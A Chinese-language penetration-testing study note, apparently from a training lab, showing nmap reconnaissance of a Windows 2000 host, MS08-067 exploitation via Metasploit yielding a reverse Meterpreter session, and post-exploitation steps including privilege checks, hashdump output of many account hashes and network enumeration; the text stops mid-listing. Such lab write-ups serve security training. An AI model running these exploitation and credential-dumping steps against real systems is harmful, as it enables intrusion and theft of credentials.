渗透测试学习笔记之案例二

渗透是个持续的过程 不断地搜集信息 整理信息 以及利用信息 最终的目标就是拿到系统乃至整个网络的最高 权限 在笔者看来 渗透测试与安全研究的最大不同就是前者擅长利用后者的研究成果并运用到实战之中 今天笔 者将继续来分析渗透测试学习笔记系列的第二个案例 案例分析 实验环境 目标靶机 10 11 1 0 24 攻击机 Kali Linux 10 11 0 38 渗透过程 首先 一如既往的利用nmap来进行端口探测 比如我简单地探测了IP 10 11 1 227 如下 nmap sV O Pn 10 11 1 227 Starting Nmap 7 50 https nmap org at 2017 08 11 07 08 CST Stats 0 04 03 elapsed 0 hosts completed 1 up 1 undergoing Script Scan NSE Timing About 0 00 done Nmap scan report for 10 11 1 227 Host is up 0 28s latency Not shown 992 closed ports PORT STATE SERVICE VERSION 135 tcp open msrpc Microsoft Windows RPC 139 tcp open netbios ssn Microsoft Windows netbios ssn 445 tcp open microsoft ds Microsoft Windows 2000 microsoft ds 1025 tcp open msrpc Microsoft Windows RPC 1026 tcp open msrpc Microsoft Windows RPC 3372 tcp open msdtc Microsoft Distributed Transaction Coordinator 5800 tcp open vnc http RealVNC 4 0 resolution 400 x250 VNC TCP port 5900 5900 tcp open vnc VNC protocol 3 8 MAC Address 00 50 56 89 71 CB VMware No exact OS matches for host If you know what OS is running on it see https nmap org submit TCP IP fingerprint OS SCAN V 7 50 E 4 D 8 11 OT 135 CT 1 CU 42087 PV Y DS 1 DC D G Y M 005056 OS TM 598CE880 P i686 pc linux gnu SEQ SP 105 GCD 1 ISR 108 TI I TS 0 SEQ S OS P 101 GCD 1 ISR 106 TI I II I SS S TS 0 OPS O1 M529NW0NNT00NNS O2 M529NW OS 0NNT00NNS O3 M529NW0NNT00 O4 M529NW0NNT00NNS O5 M529NW0NNT00NNS O6 M529N OS NT00NNS WIN W1 FAF0 W2 FAF0 W3 FAF0 W4 FAF0 W5 FAF0 W6 FAF0 ECN R Y DF Y OS T 80 W FAF0 O M529NW0NNS CC N Q T1 R Y DF Y T 80 S O A S F AS RD 0 Q OS T2 R N T3 R N T4 R N T5 R Y DF N T 80 W 0 S Z A S F AR O RD 0 Q T6 R OS N T7 R N U1 R Y DF N T 80 IPL 38 UN 0 RIPL G RID G RIPCK G RUCK G RUD G OS IE R Y DFI S T 80 CD Z Network Distance 1 hop Service Info OSs Windows Windows 2000 CPE cpe o microsoft windows cpe o microsoft windows 2000 OS and Service detection performed Please report any incorrect results at https nmap org submit Nmap done 1 IP address 1 host up scanned in 245 29 seconds 分析上面的扫描结果后 我们得到如下信息 1 目标主机开启了139 445端口且banner显示为Microsoft Windows 2000 microsoft ds 2 目标主机开启了Windows RPC服务 端口为1025和1026 3 目标主机开启了RealVNC服务 端口为5800和5900 4 目标主机很可能是Windows 2000服务器 整理完了这些信息之后 接下来我们需要思考突破点了 一个常见的思路是针对开启的服务寻找可能的利用方法 1 对于139和445端口 我们首先需要考虑的就是smb漏洞 比如 ms17 010 ms08 067等等 2 对于Windows RPC和VNC服务 我们不妨看看有没有现成的exploit可以使用 3 对于Windows 2000服务器 足够老的服务器早已不再有补丁支持 是否可以被利用 诚如我之前所说 渗透测试要善于利用已知漏洞 可以利用搜索引擎检索 也可以利用一些漏洞利用数据库去查询 如 exploit db securityfocus等 还可以直接借助已有的渗透测试工具 如 nmap的NSE脚本 Metasploit 的exploit模块 自己平时搜集的漏洞利用 等等 继续回到我们的目标主机 10 11 1 227 由于存在smb服务且目标主机很可能为Windows 2000服务器 一个简 单的猜想便是是否存在ms08 067漏洞 为了验证我们的猜想 先用nmap扫描一下 nmap script usr share nmap scripts smb vuln ms08 067 nse sT Pn 10 11 1 227 Starting Nmap 7 50 https nmap org at 2017 08 11 08 59 CST Nmap scan report for 10 11 1 227 Host is up 0 26s latency Not shown 987 closed ports PORT STATE SERVICE 21 tcp open ftp 25 tcp open smtp 80 tcp open http 135 tcp open msrpc 139 tcp open netbios ssn 443 tcp open https 445 tcp open microsoft ds 1025 tcp open NFS or IIS 1026 tcp open LSA or nterm 1029 tcp open ms lsa 3372 tcp open msdtc 5800 tcp open vnc http 5900 tcp open vnc Host script results smb vuln ms08 067 VULNERABLE Microsoft Windows system vulnerable to remote code execution MS08 067 State VULNERABLE IDs CVE CVE 2008 4250 The Server service in Microsoft Windows 2000 SP4 XP SP2 and SP3 Server 2003 SP1 and SP2 Vista Gold and SP1 Server 2008 and 7 Pre Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization Disclosure date 2008 10 23 References https cve mitre org cgi bin cvename cgi name CVE 2008 4250 从扫描结果可知 目标主机似乎是存在ms08 067漏洞的 既然如此 我们就来测试一下 考虑到msf已经有ms08 067的利用模块了 因此我们可以直接来尝试利用一下 msf use exploit windows smb ms08 067 netapi msf exploit ms08 067 netapi set RHOST 10 11 1 227 msf exploit ms08 067 netapi exploit Started reverse TCP handler on 10 11 0 38 4444 10 11 1 227 445 Automatically detecting the target 10 11 1 227 445 Fingerprint Windows 2000 Service Pack 0 4 lang English 10 11 1 227 445 Selected Target Windows 2000 Universal 10 11 1 227 445 Attempting to trigger the vulnerability Sending stage 957487 bytes to 10 11 1 227 Meterpreter session 2 opened 10 11 0 38 4444 10 11 1 227 1256 at 2017 08 11 08 39 12 0800 meterpreter 果然 目标主机存在ms08 067漏洞 并且我们成功地获得了一个meterpreter会话 一旦有了meterpreter会话 我们需要考虑以下几个问题 当前运行的账户权限是不是SYSTEM且是否需要提权 目标机器的系统信息是什么 目标机器是否存在反病毒程序影响我们的后渗透操作 目标机器上有哪些用户和组且是否存在域用户 如 域管理员账户 目标机器上是否可以dump hash 可用来破解密码或者Pass The Hash攻击 等等 如下一些常见的meterpreter和shell命令可以帮我们轻松地确认以上的问题 getuid 获取当前运行用户 meterpreter getuid Server username NT AUTHORITY SYSTEM getsystem 利用内置的payload帮助提权 meterpreter getsystem got system via technique 1 Named Pipe Impersonation In Memory Admin sysinfo 获取操作系统信息 meterpreter sysinfo Computer JD OS Windows 2000 Build 2195 Architecture x86 System Language en US Domain WORKGROUP Logged On Users 0 Meterpreter x86 windows ps 获取当前系统上正在运行的所有进程 meterpreter ps Process List PID PPID Name Arch Session User Path 0 0 System Process x86 8 0 System x86 0 NT AUTHORITY SYSTEM 172 8 smss exe x86 0 NT AUTHORITY SYSTEM SystemRoot System32 smss exe 196 172 csrss exe x86 0 NT AUTHORITY SYSTEM C WINNT system32 csrss exe 216 172 WINLOGON EXE x86 0 NT AUTHORITY SYSTEM C WINNT system32 winlogon exe 244 216 services exe x86 0 NT AUTHORITY SYSTEM C WINNT system32 services exe 256 216 LSASS EXE x86 0 NT AUTHORITY SYSTEM C WINNT system32 lsass exe 452 244 svchost exe x86 0 NT AUTHORITY SYSTEM C WINNT system32 svchost exe 480 244 SPOOLSV EXE x86 0 NT AUTHORITY SYSTEM C WINNT system32 spoolsv exe 512 244 msdtc exe x86 0 NT AUTHORITY SYSTEM C WINNT System32 msdtc exe 616 244 svchost exe x86 0 NT AUTHORITY SYSTEM C WINNT System32 svchost exe 644 244 LLSSRV EXE x86 0 NT AUTHORITY SYSTEM C WINNT System32 llssrv exe 676 244 sqlservr exe x86 0 NT AUTHORITY SYSTEM C PROGRA 1 MICROS 3 MSSQL binn sqlservr exe 748 244 regsvc exe x86 0 NT AUTHORITY SYSTEM C WINNT system32 regsvc exe 772 244 sqlagent exe x86 0 NT AUTHORITY SYSTEM C PROGRA 1 MICROS 3 MSSQL binn sqlagent exe 784 244 mstask exe x86 0 NT AUTHORITY SYSTEM C WINNT system32 MSTask exe 812 244 snmp exe x86 0 NT AUTHORITY SYSTEM C WINNT System32 snmp exe 860 244 vmtoolsd exe x86 0 NT AUTHORITY SYSTEM C Program Files VMware VMware Tools vmtoolsd exe 936 244 winmgmt exe x86 0 NT AUTHORITY SYSTEM C WINNT System32 WBEM WinMgmt exe 948 244 winvnc4 exe x86 0 NT AUTHORITY SYSTEM C Program Files RealVNC VNC4 WinVNC4 exe 960 244 svchost exe x86 0 NT AUTHORITY SYSTEM C WINNT system32 svchost exe 980 244 inetinfo exe x86 0 NT AUTHORITY SYSTEM C WINNT System32 inetsrv inetinfo exe 992 244 mssearch exe x86 0 NT AUTHORITY SYSTEM C Program Files Common Files System MSSearch Bin mssearch exe 1092 244 dfssvc exe x86 0 NT AUTHORITY SYSTEM C WINNT system32 Dfssvc exe 1580 244 svchost exe x86 0 NT AUTHORITY SYSTEM C WINNT System32 svchost exe hashdump 获取系统上所有用户的LM Hash或者NTLM Hash meterpreter hashdump admin 1007 a46139feaaf2b9f117306d272a9441bb c5e0002fde3f5eb2cf5730ffee58ebcc Administrator 500 7bfd3ee62cbb0eba886450c5d6c50f12 f3acbe7ec27aadbe8deeaa0c651a64af backup 1006 16ac416c2658e00daad3b435b51404ee 938df8b296dd15d0dce8eaa37be593e0 david 1009 43af16fff22f1628aad3b435b51404ee 1fbff38cae51e9918da1fec572f03e11 gary 1013 998d9dc042886317c72befe227197ae1 ba359fa9d25791c2180e424bb7bb0753 Guest 501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0 homer 1017 ef91a6d3cf901b8baad3b435b51404ee b184d292a82b6ad35c3cfca81f1f59bc IUSR SRV2 1020 f7d96ebcbe5b6be3103ccb00190f6271 09ff503707453d56bb69f40bef542da0 IWAM SRV2 1019 96fe1fc02d73a84c463db170b09126f1 be6ec26d0d71a533e14b65ce755d7bce john 1010 e52cac67419a9a2238f10713b629b565 5835048ce94ad0564e29a924a03510ef lee 1015 b096847ead9b7476aad3b435b51404ee 208adb08381adab3032eedbd35399642 lisa 1011 a179639dcaf4e1c4aad3b435b51404ee 8acf28fdc0168e003fb3e05bcb463d1b mark 1012 6c3d4c343f999422aad3b435b51404ee bcd477bfdb45435a34c6a38403ca4364 ned 1016 836eda0fbc609e6393e28745b8bf4ba6 4f16328129408ed105dec3a938c266eb nick 1014 59b8b93a9a6477e4aad3b435b51404ee ee28ad35a22c752c1a75be3f9a7e82c9 simon 1008 598ddce2660d3193aad3b435b51404ee 2d20d252a479f485cdf5e171d93985bf sqlusr 1005 6307ab24156c541aaad3b435b51404ee 6a370590bd44ac8e65d045254a170ab7 todd 1018 9e00b755e79c8cf95533b366e9511e4b 4150133921fe34dd2e777b1ca0361410 TsInternetUser 1000 e52cac67419a9a22f96f275e1115b16f e22e04519aa757d12f1219c4f31252f4 shell 开启一个cmd shell以便获取更过系统信息或者执行payload meterpreter shell Process 760 created Channel 1 created Microsoft Windows 2000 Version 5 00 2195 C Copyright 1985 2000 Microsoft Corp C WINNT system32 net users net users User accounts for admin Administrator backup david gary Guest homer IUSR SRV2 IWAM SRV2 john lee lisa mark ned nick simon sqlusr todd TsInternetUser The command completed with one or more errors C WINNT system32 net view domain net view domain Domain MYGROUP THINC WORKGROUP The command completed successfully C WINNT system32 ipconfig all ipconfig all Windows 2000 IP Configuration Host Name jd Primary DNS Suffix acme local Node Type Mixed IP Routing Enabled No WINS Proxy Enabled No DNS Suffix Search List acme local Ethernet adapter Local Area Connection Connection specific DNS Suffix Description VMware Accelerated AMD PCNet Adapter Physical Address 00 50 56 89 5E EC DHCP Enabled No IP Address 10 11 1 227 Subnet Mask 255 255 0 0 Default Gateway 10 11 1 220 DNS Servers 10 11 1 220 10 11 1 221 C WINNT system32 net localgroup administrators net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer domain Members Administrator backup The command completed successfully C WINNT system32 net view net view Server Name Remark BETHANY BOB2 CORY GAMMA MAIL thincmail MIKE mike SHERLOCK The